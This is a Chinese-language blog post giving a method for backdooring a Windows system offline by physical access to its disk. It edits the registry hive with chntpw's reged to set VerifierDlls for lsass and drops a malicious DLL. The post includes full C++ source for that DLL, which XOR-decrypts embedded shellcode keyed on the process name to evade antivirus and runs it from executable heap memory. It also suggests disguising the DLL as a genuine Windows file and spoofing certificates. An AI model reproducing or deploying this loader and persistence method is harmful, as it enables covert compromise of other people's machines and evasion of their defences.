使用DoubleAgent与chntpw感染盘内windows系统

2023-07-17 12:03:06

近源后门植入多采用badusb等系统登录后或强制登陆后植入后门的方式，这种方式留痕较多且目标较为明显。

本文提供一种在物理接触下（进入PE系统，拆卸硬盘等）对盘内系统植入后门的方式（无全盘加密）

DoubleAgent

介绍

DoubleAgent is a new Zero-Day technique for injecting code and maintaining persistence on a machine (i.e. auto-run).
DoubleAgent 是一种新的零日技术，用于注入代码并维护机器上的持久性（即自动运行）。

DoubleAgent can exploit:
DoubleAgent 可以利用：

Every Windows version (Windows XP to Windows 10)
每个 Windows 版本（Windows XP 到 Windows 10）
Every Windows architecture (x86 and x64)
每个 Windows 体系结构（x86 和 x64）
Every Windows user (SYSTEM/Admin/etc.)
每个 Windows 用户（系统/管理员/等）
Every target process, including privileged processes (OS/Antivirus/etc.)
每个目标进程，包括特权进程（操作系统/防病毒/等）

DoubleAgent exploits a 15 years old legitimate feature of Windows and therefore cannot be patched.
DoubleAgent 利用了 Windows 15 年前的合法功能，因此无法修补。

原理

DoubleAgent利用了Windows提供的VerifierDll功能，通过修改注册表项将符合VerifierDll结构的DLL注入进任意进程

在

1	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xxx.exe

中配置如下键值后：

1 2	"GlobalFlag"="0x100" "VerifierDlls"="DoubleAgentDll.dll"

系统在启动xxx.exe时便会从system32下加载所配置名称的DLL。

杀软防御

经测试杀软会拦截对该表项的操作，使其在杀软条件下存在利用问题。若在近源场景中可以对其进行放行。

chntpw

chntpw是一个古老的套件，其提供了windows注册表编辑的功能（经测试比较好用，可以直接导入注册表文件）

其提供了reged程序

root@kali:~# reged -h
reged version 0.1 140201, (c) Petter N Hagen

Modes:
-x <registryhivefile> <prefixstring> <key> <output.reg>
   Xport. Where <prefixstring> for example is HKEY_LOCAL_MACHINE\SOFTWARE
   <key> is key to dump (recursively), \ or \\ means all keys in hive
   Only one .reg and one hive file supported at the same time
-I <registryhivefile> <prefixstring> <input.reg>
   Import from .reg file. Where <prefixstring> for example is HKEY_LOCAL_MACHINE\SOFTWARE
   Only one .reg and one hive file supported at the same time
-e <registryhive> ...
   Interactive edit one or more of registry files

Options:
-L : Log changed filenames to /tmp/changed, also auto-saves
-C : Auto-save (commit) changed hives without asking
-N : No allocate mode, only allow edit of existing values with same size
-E : No expand mode, do not expand hive file (safe mode)
-t : Debug trace of allocated blocks
-v : Some more verbose messages

（经测试可以编译windows版本并正常使用）

整体利用

介绍完上面两个科技想必大家都能猜出如何向盘内系统植入后门了

通过PE系统在目标机器上进行植入或拆下硬盘在自己设备上进行植入

制作符合VerifierDll格式的后门（这里照着一些开源代码进行编写代码放在最后）
通过reged程序修改盘内系统注册表文件添加VerifierDlls
拷贝后门DLL

如此即可不启动目标系统植入后门，但要注意敏感目录监控可能会捕获到拷贝进去的DLL文件

注入工具

只进行过手动安装验证，暂无工具

工具仅需要自动化完成

1.寻找存在windows的盘

2.调用 reged -I <registryhivefile> <prefixstring> <input.reg>

其中注册表路径（XP之后）为

Windows\system32\config\System

3.拷贝DLL文件

注册表

可以使用DoubleAagent工具注入后导出注册表，也可以手动添加（这里选择lsass进程，权限高启动早通用性强）

VerifierDll

由于我们已知会被注入的进程名，所以通过获取进程名解密shellcode以躲避杀软的静态分析

DLL编译后还可以克隆一个windows的DLL的描述信息以假乱真。数字签名的问题就靠各显神通了，不过不是微软的签名被注意到了基本都无了，也可以想办法装个根证书欺骗一下，不过那就是另外的话题了。

// dllmain.cpp : 定义 DLL 应用程序的入口点。

#include "pch.h"
#include <windows.h>
#include <winternl.h>
#include "shellcode.h"
#define _NO_CRT_STDIO_INLINE 1
#define NOMINMAX
#define _CRT_SECURE_NO_WARNINGS
#define WIN32_NO_STATUS
#define WIN32_LEAN_AND_MEAN
// See AVRF.md to get how this thing works

// Semi-private ntapi stuff

EXTERN_C_START
#	define DebugPrint(str, ...) DbgPrintEx( 103u, 3u, "[RAT] " __FUNCTION__ ": " str, ## __VA_ARGS__)
using RTL_VERIFIER_DLL_LOAD_CALLBACK = VOID(NTAPI*) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);
using RTL_VERIFIER_DLL_UNLOAD_CALLBACK = VOID(NTAPI*) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);
using RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK = VOID(NTAPI*) (PVOID AllocationBase, SIZE_T AllocationSize);
typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
    PCSTR ThunkName;
    PVOID ThunkOldAddress;
    PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, * PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
    PCWSTR  DllName;
    DWORD   DllFlags;
    PVOID   DllAddress;
    PRTL_VERIFIER_THUNK_DESCRIPTOR  DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, * PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
    DWORD   Length;
    PRTL_VERIFIER_DLL_DESCRIPTOR      ProviderDlls;
    RTL_VERIFIER_DLL_LOAD_CALLBACK    ProviderDllLoadCallback;
    RTL_VERIFIER_DLL_UNLOAD_CALLBACK  ProviderDllUnloadCallback;
    PCWSTR  VerifierImage;
    DWORD   VerifierFlags;
    DWORD   VerifierDebug;
    PVOID   RtlpGetStackTraceAddress;
    PVOID   RtlpDebugPageHeapCreate;
    PVOID   RtlpDebugPageHeapDestroy;
    RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR, * PRTL_VERIFIER_PROVIDER_DESCRIPTOR;


static VOID NTAPI DllLoadCallback(PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);

static RTL_VERIFIER_DLL_DESCRIPTOR s_dll_descriptors[] = { {} };

static RTL_VERIFIER_PROVIDER_DESCRIPTOR s_provider_descriptor =
{
  sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR),
  s_dll_descriptors,
  &DllLoadCallback
};
#pragma comment(lib, "ntdll.lib")
#define NtCurrentProcess() (HANDLE(LONG_PTR(-1)))
NTSYSAPI
NTSTATUS
NTAPI
LdrDisableThreadCalloutsForDll(
    _In_  PVOID DllImageBase
);
NTSYSAPI
ULONG
DbgPrintEx(
    ULONG ComponentId,
    ULONG Level,
    PCSTR Format,
    ...
);
EXTERN_C_END


void Xor(char* key, unsigned char* dst, int dstlen) {
    size_t keylen = strlen(key);
    for (int i = 0; i < dstlen; i++) {
        *(dst + i) ^= key[i % keylen];
    }
}



VOID CALLBACK MyWaitCallback(
    PTP_CALLBACK_INSTANCE Instance,
    PVOID                 Parameter,
    PTP_WAIT              Wait,
    TP_WAIT_RESULT        WaitResult
)
{
    // Instance, Parameter, Wait, and WaitResult not used in this example.
    UNREFERENCED_PARAMETER(Instance);
    UNREFERENCED_PARAMETER(Parameter);
    UNREFERENCED_PARAMETER(Wait);
    UNREFERENCED_PARAMETER(WaitResult);
    char exepath[128];
    DWORD pathlen = 128;
    QueryFullProcessImageNameA(GetCurrentProcess(), 0, exepath, &pathlen);
    char text[9] = { 0x0a,0x54,0x36,0x32,0x0a,0x1a,0x01,0x0b,0x77 };
    Xor(exepath, (unsigned char*)text, 9);
    //MessageBoxA(0, text, "My DLL Injected!", 0);
    Xor(exepath, shellcode, 236614);
    LPVOID heapp = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    LPVOID ptr = HeapAlloc(heapp, 0, 409600);
    RtlMoveMemory(ptr, shellcode, sizeof(shellcode));
    HANDLE hEvent;
    hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    PTP_WAIT ptp_w = CreateThreadpoolWait((PTP_WAIT_CALLBACK)ptr, NULL, NULL);
    SetThreadpoolWait(ptp_w, hEvent, 0);
    SetEvent(hEvent);
    WaitForThreadpoolWaitCallbacks(ptp_w, FALSE);
    SetEvent(hEvent);
    while (TRUE)
    {
        Sleep(10000);
    }
}


VOID waitPool() {
    char exepath[128];
    DWORD pathlen = 128;
    QueryFullProcessImageNameA(GetCurrentProcess(), 0, exepath, &pathlen);
    char code[18] = { 0x16,0x54,0x2f,0x27,0x19,0x01,0x16,0x1b,0x57,0x25,0x39,0x21,0x0a,0x1a,0x1b,0x0b,0x4c,0x33 };
    Xor(exepath, (unsigned char *)code, 18);
    if (strcmp(code, "Unspport Version!")) return;
    HANDLE hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    PTP_WAIT ptp_w = CreateThreadpoolWait((PTP_WAIT_CALLBACK)MyWaitCallback, NULL, NULL);
    SetThreadpoolWait(ptp_w, hEvent, 0);
    SetEvent(hEvent);
    WaitForThreadpoolWaitCallbacks(ptp_w, FALSE);
    SetEvent(hEvent);
}
BOOL WINAPI DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       PRTL_VERIFIER_PROVIDER_DESCRIPTOR* provider
                     )
{

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LdrDisableThreadCalloutsForDll(hModule);
        waitPool();
        break;
    case 4://DLL_PROCESS_VERIFIER
        *provider = &s_provider_descriptor;
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}


static VOID NTAPI DllLoadCallback(PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved)
{
    UNREFERENCED_PARAMETER(DllSize);
    UNREFERENCED_PARAMETER(Reserved);
    //dll_loaded(DllBase, DllName);
}

2023-07-17 12:03:06